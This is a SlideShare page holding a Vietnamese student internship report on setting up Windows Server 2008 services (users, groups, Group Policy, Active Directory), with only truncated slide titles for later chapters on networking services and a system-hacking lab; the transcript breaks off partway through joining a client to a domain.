Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 1
CHƯƠNG 1: TỔNG QU...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 2
Web
 Windows Ser...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 3
 Tương tác với m...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 4
Việc lựa chọn phi...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 5
 Memory: tối thi...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 6
1. Mục tiêu: tạo ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 7
Ta làm Tương tự đ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 8
Add user u1 vào g...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 9
Trong Users Accou...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 10
2.1.2 Triển khai...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 11
Trong Console1-[...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 12
Trong Browse for...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 13
Ta thực hiện tươ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 14
Trong Local Grou...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 15
Để update group ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 16
Trong Prohibit a...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 17
Sau khi chạy son...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 18
Trong Remove Rec...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 19
2.2 DOMAIN
2.2.1...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 20
Cài đặt được thự...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 21
Sau đó tiếp tục ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 22
a new domain in ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 23
không thể tìm th...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 24
Click phải My Co...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 25
2.3 TRIỂN KHAI D...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 26
Click Add Roles
...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 27
Chọn Add Require...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 28
Click Add Requir...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 29
Ta đăng ký trang...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 30
 Site name: Ath...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 31
R-Click FTP Site...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 32
Ðặt tên cho FTP ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 33
Click Next
Chọn ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 34
 READ : Chỉ đọc...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 35
2.3.3 DNS
Mục ti...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 36
R-Click Forward ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 37
Chọn Primary zon...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 38
Click Next
Click...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 39
Click Finish
2.4...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 40
- Exclusion Scop...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 41
Click Add Roles....
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 42
Chọn chính xác c...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 43
DHCP Scopes > Cl...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 44
IP version 6: Di...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 45
2.5 TRIỂN KHAI D...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 46
VPNs đầu tiên đã...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 47
Mô hình:
Thực hi...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 48
Bấm vào Add Role...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 49
Click chọn Routi...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 50
Click Next
Chọn ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 51
Chọn hai mục: VP...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 52
Click chọn: Stat...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 53
Trong nhánh Conf...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 54
R-Click vào User...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 55
Bước 4: Tạo kết ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 56
Điền thông tin c...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 57
Chọn Add a shorc...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 58
Điền thông tin u...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 59
Trên máy PC 2 ti...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 60
NIC 1: 192.168.1...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 61
Bấm vào Add Role...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 62
Click chọn Netwo...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 63
Thực hiện trên S...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 64
Chọn dòng Custom...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 65
R-Click vào Netw...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 66
Ðặt tên interfac...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 67
Chọn Automatic s...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 68
Chọn thêm: Add a...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 69
Trên Server 1: Ð...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 70
Phần User cho Di...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 71
Click chọn: Stat...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 72
Ở một loạt các g...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 73
.
Nhập vào tên d...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 74
Tiếp tục ta nhập...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 75
3.1.3 Cấu Hình
K...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 76
3.1.4 Kiểm Tra
T...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 77
b. Cấu hình
Ta c...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 78
CHƯƠNG 4: SYSTEM...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 79
Tìm mã lỗi bằng ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 80
Trên máy XP ta v...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 81
Dùng lệnh sessio...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 82
Sau khi seach đư...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 83
Trên máy Back Tr...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 84
4.3 Khai thác lỗ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 85
Trên máy Back tr...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 86
CHƯƠNG 5: HƯỚNG ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 87
Những gì đạt đượ...
Nghiên cứu và triển khai các dịch vụ trên Window Server 2008
Sinh viên thực tập: Nguyễn Cao Tuấn Trang 88
DANH MỤC TÀI LIỆ...
Upcoming SlideShare
Loading in …5
×

Bao cao thuc tap

364 views

Published on

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
364
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
10
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Bao cao thuc tap

  1. 1. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 1 CHƯƠNG 1: TỔNG QUAN VỀ WINDOWS SERVER 2008 1.1 Giới thiệu: Microsoft Windows Server 2008 là thế hệ tiếp theo của Hệ điều hành Windows Server giúp các chuyên gia CNTT kiểm soát được cơ sở hạ tầng tối ưu nhất mà vẫn đảm bảo khả năng quản lý, tính sẵn sàng, môi trường máy phục vụ mạnh mẽ, ổn định, và bảo mật hơn nhiều so với trước đây. Windows Server 2008 mang lại giá trị mới cho tổ chức vì mọi người dù đang ở bất cứ đâu cũng nhận được đầy đủ mọi dịch vụ của mạng. Windows Server 2008 cũng giúp hiểu biết sâu sắc hơn về hệ điều hành cùng khả năng chẩn đoán sự cố để các nhà quản trị mạng có nhiều thời gian tập trung tạo thêm giá trị nghiệp vụ. Windows Server 2008 dựa trên sự thành công và sức mạnh của hệ điều hành Windows Server 2003 được khen ngợi và trên các cải tiến trong Service Pack 1 và Windows Server 2003 R2. Tuy vậy, Windows Server 2008 không chỉ cải tiến các hệ điều hành trước mà được thiết kế để mang lại cho tổ chức một nền tảng có năng suất cao nhất để phục vụ các ứng dụng, mạng và các dịch vụ Web từ nhóm làm việc đến trung tâm dữ liệu, bằng tính năng mới, giá trị và hấp dẫn cùng những cải tiến lớn trong hệ điều hành cơ sở. Các cải tiến trong Hệ điều hành Windows Server Ngoài tính năng mới, Windows Server 2008 còn có nhiều cải tiến lớn trong hệ điều hành cơ sở so với Windows Server 2003. Các cải tiến đáng chú ý gồm có những cải tiến về mạng, các tính năng bảo mật nâng cao, truy cập ứng dụng từ xa, quản lý các vai trò của máy phục vụ trung tâm, các công cụ giám sát độ tin cậy và vận hành, kết nối server dự phòng sự cố/kết nối chuyển dịch server khi có sự cố, triển khai và hệ thống tập tin. Những cải tiến này và nhiều cải tiến khác nữa sẽ giúp tổ chức tối ưu hoá mức độ linh hoạt, tính sẵn sàng và khả năng kiểm soát các máy phục vụ của mình. 1.2 Các lợi ích của Windows Server 2008 Windows Server 2008 mang lại lợi ích trong bốn lĩnh vực chính:
  2. 2. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 2 Web  Windows Server 2008 mang lại khả năng chuyển giao kinh nghiệm về web phong phú một cách hiệu quả và thực tế, nhờ khả năng quản trị và chẩn đoán sự cố trên mạng tốt hơn, công cụ lập trình và phát triển ứng dụng tốt hơn và chi phí bỏ ra cho cơ sở hạ tầng thấp hơn.  Đơn giản hoá việc quản lý máy phục vụ Web nhờ có Internet Information Services 7.0, là nền tảng làm Web mạnh cho ứng dụng và dịch vụ. Nền tảng kiểu mô-đun này có giao diện quản lý theo tác vụ và đơn giản, có khả năng kiểm tra chéo mạnh hơn, cải tiến về bảo mật và quản lý hoạt động thống nhất cho mọi Web service.  Các giao diện theo tác vụ giúp đơn giản hoá việc quản lý chung các tác vụ của máy phục vụ Web.  Khả năng sao chép liên site giúp bạn sao chép thiết lập của trang Web qua nhiều máy phục vụ Web mà không cần cấu hình thêm.  Quản trị ứng dụng và site chuyên biệt nên bạn có thể giao quyền kiểm soát các phần khác nhau của máy phục vụ Web cho người cần giao.  Chuyển giao các ứng dụng toàn diện và linh hoạt giúp nối kết các người dùng và dữ liệu lại với nhau, làm cho họ có thể ảo hoá, chia sẻ và tác động lên thông tin. Ảo hoá  Nhờ khả năng ảo hoá có sẵn trong hệ điều hành và chính sách cấp phép uyển chuyển hơn, đơn giản hơn, nên tận dụng được lợi ích và tiết kiệm chi phí. Tính năng ảo hoá có sẵn sẽ ảo hoá nhiều hệ điều hành - Windows, Linux và các hệ điều hành khác – trên một máy phục vụ.  Truy cập ứng dụng tập trung và tích hợp liền lạc các ứng dụng phân bổ từ xa. Các cải tiến còn giúp kết nối ứng dụng từ xa qua các tường lửa không dùng VPN, vì thế bạn có thể đáp ứng yêu cầu của người dùng nhanh chóng, dù họ đang ở đâu.  Các tùy chọn triển khai mới có các phương pháp triển khai thích hợp cho môi trường của bạn nhất.
  3. 3. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 3  Tương tác với môi trường sẵn có.  Cộng đồng kỹ thuật giỏi và mạnh mẽ hỗ trợ kinh nghiệm phong phú trong suốt vòng đời sản phẩm. Bảo mật  Windows Server 2008 là máy phục vụ Windows bảo mật nhất từ trước đến nay. Những cải tiến về bảo mật và hệ điều hành qua tôi luyện, gồm Network Access Protection, Federated Rights Management, và Read-Only Domain Controller có nhiều cấp độ bảo vệ mạng, bảo vệ dữ liệu và công ty chưa từng có.  Bảo vệ máy phục vụ bằng những cải tiến bảo mật làm giảm tấn công bề mặt của trung tâm hệ điều hành, nên môi trường phục vụ càng bảo mật hơn và mạnh hơn.  Bảo vệ truy cập mạng bằng Network Access Protection nên có thể cách ly các máy tính không tuân thủ chính sách bảo mật đã định. Khả năng bắt buộc tuân thủ các yêu cầu về bảo mật là công cụ mạnh bảo vệ mạng.  Các giải pháp tạo chính sách và quy tắc thông minh mới giúp tăng khả năng kiểm soát và bảo vệ khi nối mạng, cho ta một mạng hoạt động theo chính sách.  Bảo vệ dữ liệu đảm bảo chỉ người dùng nào có mật mã đúng mới được truy cập, và luôn sẵn sàng khi phần cứng bị hỏng hóc.  Chống lại các phần mềm độc hại bằng User Account Control với cách xác thực người dùng mới.  Tăng cường kiểm soát thiết lập của người dùng bằng Expanded Group Policy. 1.3 Các phiên bản: Windows Server 2008 hiện có 6 phiên bản chính: Windows Server 2008 Standard, Windows Server 2008 Enterprise, Windows Server 2008 DataCenter, Windows Web Server 2008,Windows HPC (High-performance computing) Server 2008,Windows Server 2008 for Itanium-based Systems. Ngoài ra còn có 3 phiên bản Standard, Enterprise, DataCenter không hỗ trợ Hyper-V.
  4. 4. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 4 Việc lựa chọn phiên bản nào thì phụ thuộc vào yêu cầu của doanh nghiệp. Ví dụ: Windows Server 2008 Standard Edition là lựa chọn tốt nhất cho doanh nghiệp nhỏ với không cần tới khả năng mở rộng của phần cứng cũng như tính năng clustering Windows Server 2008 Enterprise Edition là lựa chọn tốt cho môi trường doanh nghiệp lớn hỗ trợ đầy đủ các tính năng như: clustering, failover, virtualization, và khả năng mở rộng phần cứng của doanh nghiệp là yêu cầu bắt buộc cho độ đảm bảo hệ thống Windows Server 2008 DataCenter Edition (IA-64 DataCenter Edition) là tùy chọn trong các trường hợp như database server và các ứng dụng Line-of-Business (LOB). Phiên bản này của Microsoft Windows Server không giới hạn quyền sử dụng tính năng ảo hóa, thích hợp cho các dự án tập trung hóa (consolidation) hệ thống. Ba phiên bản Standard, Enterprise và DataCenter gồm 2 bản Full (Full thì bao gồm đầy đủ các tính năng và hỗ trợ ứng dụng graphic-based application) và Server Core. Server Core là một lựa chọn tốt trong hợp muốn tăng cường bảo mật hoặc sử dụng trên server với cấu hình hạn chế để cung cấp các dịch vụ sau cho doanh nghiệp: Active Directory Domain Service, Active Directory Lightweight Directory Service, Dynamic Host Configuration Protocol server, Domain Name System (DNS), File Services, Print Server. Các vai trò này (server role) được quản lý thông qua giao tiếp dòng lệnh (Command-line interface) hoặc từ các công cụ quản trị trên Windows Server 2008 hoặc Vista. Yêu cầu phần cứng để cài đặt Windows Server 2008  Processor: tối thiểu 1GHz, khuyến cáo tốc độ bộ vi xử lý nên là 2GHz trở lên, tốc độ tối ưu là 3Ghz trở lên, tốc độ càng cao càng tốt.
  5. 5. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 5  Memory: tối thiểu là 512 MB, khuyến cáo bộ nhớ nên là 1 GB. Bản Standard (32 bit) support tối đa 4GB, Bản Enterprise 32bit support tối đa 32 GB RAM. Còn đối với bản 64bit thì Standard support 32GB RAM các phiên bản còn lại support 2TB RAM.  HDD: Không gian đĩa cứng tối thiểu để cài đặt Windows Server 2008 là 8 GB, khuyến cáo của Mircrosoft đối với bản Full thì không gian đĩa cứng nên là 40 GB, bản Server Core là 10 GB, và không gian đĩa cứng tối ưu đối với bản Full là 80 GB và bản Server Core là 40 GB.  Optical Driver: DVD-ROM. CHƯƠNG 2: TRIỂN KHAI CÁC DỊCH VỤ CỦA WINDOWS SERVER 2008 TRÊN VMWARE 2.1 TRIỂN KHAI USER, GROUP VÀ POLICY 2.1.1 Triển khai user và group Mô hình:
  6. 6. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 6 1. Mục tiêu: tạo local user và group trên máy server và có thể đăng nhập vào máy server 2. Thực hiện: Bước 1: Tạo local user Trên máy server1, vào Start chọn Run rồi gõ lusrmgr.mscđể vào Local Users and Groups: Trong Local Users and Groups, ta chuột phải vào Users chọn New User để tạo 2 user u1, u2 với password là 123abc!!!:
  7. 7. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 7 Ta làm Tương tự đối với user u2 Bước 2: ( Tạo Local Group và add user vào Group đó ): Trên máy server1 ta vào Start chọn Run rồi gõ lusrmgr.msc để vào Local Users and Groups Trong Local Users and Groups, Chuột phải vào Groups chọn New Group tạo 2 group ketoan, nhansu rồi chọn Add để thêm u1 vào group ketoan và u2 vào group nhansu:
  8. 8. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 8 Add user u1 vào group kế toán Add user u2 vào group nhân sự. Bước 3: (cấu hình cho phép user u1 tự động đăng nhập vào server1 khi khởi động): Trên máy server1, vào Start chọn Run rồi gõ Control UserPasswords2 để vào Users Accounts:
  9. 9. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 9 Trong Users Accounts, bỏ check ở phần Users must enter a user name and password to use this computer rồi chọn Apply: Sau đó nhập tên user và password muốn đăng nhập tự động vào server1:
  10. 10. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 10 2.1.2 Triển khai local policy Mô hình: Mục tiêu: áp dụng các chính sách khác nhau lên từng đối tượng user khác nhau trên server Thực hiện: Bước 1: (Tạo Group Policy Console cho u2, Administrator, Non-Administrator): Trên máy server1, vào Start chọn Run rồi gõ MMC để vào Console1-[Console Root]:
  11. 11. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 11 Trong Console1-[Console Root], chọn File -> Add/Remove Snap-ins Trong Add/Remove Snap-ins, chọn Group Policy Object rồi chọn Add Trong Select Group Policy Object, chọn Browse:
  12. 12. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 12 Trong Browse for a Group Policy Object ta sang tab Users để chọn user u2: Trở lại Select Group Policy Object, chọn Finish:
  13. 13. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 13 Ta thực hiện tương tự để cho group Administrators và Non-Administrators. Sau khi tạo xong u2, Administrators và Non-Administrators, ta sẽ vào File rồi chọn Save để lưu lại Console này lại. Bước 2: ( Tạo Group Policy để tắt Shutdown Event Tracker trên server1 cho Administrators): Chọn Start->Run rồi gõ gpedit.msc để vào Local Group Policy Editor:
  14. 14. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 14 Trong Local Group Policy Editor, chọn Computer Comfiguration -> Administrative Templates->System rồi chọn Dislay Shutdown Event Tracker: Trong Dislay Shutdown Event Tracker Properties, check vào Disabled:> Apply > Ok
  15. 15. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 15 Để update group policy vừa cấu hình, ta vào Start->Run gõ cmd. Sau đó ta gõ lệnh gpupdate /force.Khi update song ta Test Group Policy vừa tạo: Bước 3: ( Tạo Group Policy không cho group Non-Administrators truy cập Control Panel):  Trên máy server1, ta mở lại Group Policy Console đã tạo khi nãy rồi chọn Non-Administrators Policy:  Trong Non-Administrators Policy, chọn User Configuration ->Administrative Templates->Control Panel rồi chọn Prohibit access to the Control Panel:
  16. 16. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 16 Trong Prohibit access to the Control Panel Properties chọn Enabled:>Apply>OK Để update group policy vừa cấu hình, ta vào Start->Run gõ cmd. Sau đó gõ lệnh gpupdate /force:
  17. 17. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 17 Sau khi chạy song lệnh ta sẽ Test Group Policy vừa tạo bằng cách đăng nhập vào user u1 và user u3 để kiểm tra. Ở 2 user này ta không thấy xuất hiện control panel như vậy là ta đã thực hiện thành công group policy vừa tạo Bước 4(cấu hinh group policy không hiển thị Recycle Bin khi user u2 đăng nhập server1):  Trên máy server1, ta mở lại Group Policy Console đã tạo khi nãy rồi chọn u2 Policy: Trong u2 Policy, chọn User Configuration ->Administrative Templates->Desktop rồi chọn Remove Recycle Bin icon from desktop:
  18. 18. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 18 Trong Remove Recycle Bin icon from desktop properties, chọn Enabled > Apply > OK Để update group policy vừa cấu hình, ta vào Start->Run gõ cmd. Sau đó gõ lệnh gpupdate /force: Sau khi update song ta Test Group Policy vừa tạo bằng cách đăng nhập vào u2 để kiểm tra ở user u2 ta không thấy recycle bin như vậy là ta đã thực hiện thành công group policy vừa tạo.
  19. 19. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 19 2.2 DOMAIN 2.2.1 DOMAIN CONTROLLER Giống như Windows Server 2003 sẽ vẫn cần chạy dcpromo từ nhắc lệnh Run, tuy nhiên cần phải cài đặt Active Directory Domain Controller role, đầu tiên bạn cài đặt role, sau đó chạy dcpromo.Vào Server ManagerRolesAdd Roles. Xuất hiện trang Before You Begin, nhấn Next để tiếp tục. Chọn Active Directory Domain ServicesAdd Required Features để cài đặt thêm các tính năng này với Active Directory Server Role. Sau khi chọn Active Directory DC Server Role, bạn sẽ thấy các thông tin về Server Role. Kích Install để cài đặt các file yêu cầu nhằm chạy dcpromo.
  20. 20. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 20 Cài đặt được thực hiện thành công. Kích Close. Lúc này vào menu Start, đánh dcpromo vào hộp tìm kiếm. Kích dcpromo. Thao tác này sẽ khởi chạy Welcome to the Active Directory Domain Service Installation Wizard. Kích Next.
  21. 21. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 21 Sau đó tiếp tục nhấn Next. Trong trang Choose a Deployment Configuration Create
  22. 22. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 22 a new domain in a new forest. Trong trang Name the Forest Root Domain, nhập vào tên của miền trong hộp nhập liệu FQDN of the forest room domain.Nhấn Next để tiếp tục. Trong trang Set Forest Functional Level, chọnWindows Server 2008. Nhấn Next để tiếp tục. Trong trang Additional Domain Controller Options, Chọn DNS server và kích Next.Một hộp thoại sẽ xuất hiện nói rằng không thể tạo đại biểu cho máy chủ DNS này vì
  23. 23. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 23 không thể tìm thấy vùng xác thực hoặc nó không chạy Windows DNS server. Lý do cho điều này là vì đây là DC đầu tiên trên mạng. Nhấn Next để tiếp tục. Để lại thư mục Database, Log Files và SYSVOL ,kích Next. Trong Directory Service Restore Mode Administrator Password, nhập một mật khẩu mạnh vào các hộp nhập liệu Password và Confirm password. Xác nhận các thông tin trên trang Summary và kích Next. Active Directory sẽ cài đặt. Đặt một dấu kiểm vào hộp chọn Reboot on completion để máy tính sẽ tự động khởi động lại khi cài đặt DC được hoàn tất. Cài đặt sẽ hoàn tất khi đăng nhập. 2.2.2 Đăng nhập máy Client vào DOMAIN Đặt địa chỉ IP.Click phải vào My Network placesProperties.Chọn Manager network connectionsClick phải vào biểu tượng card mạng chọn Properties.Chọn 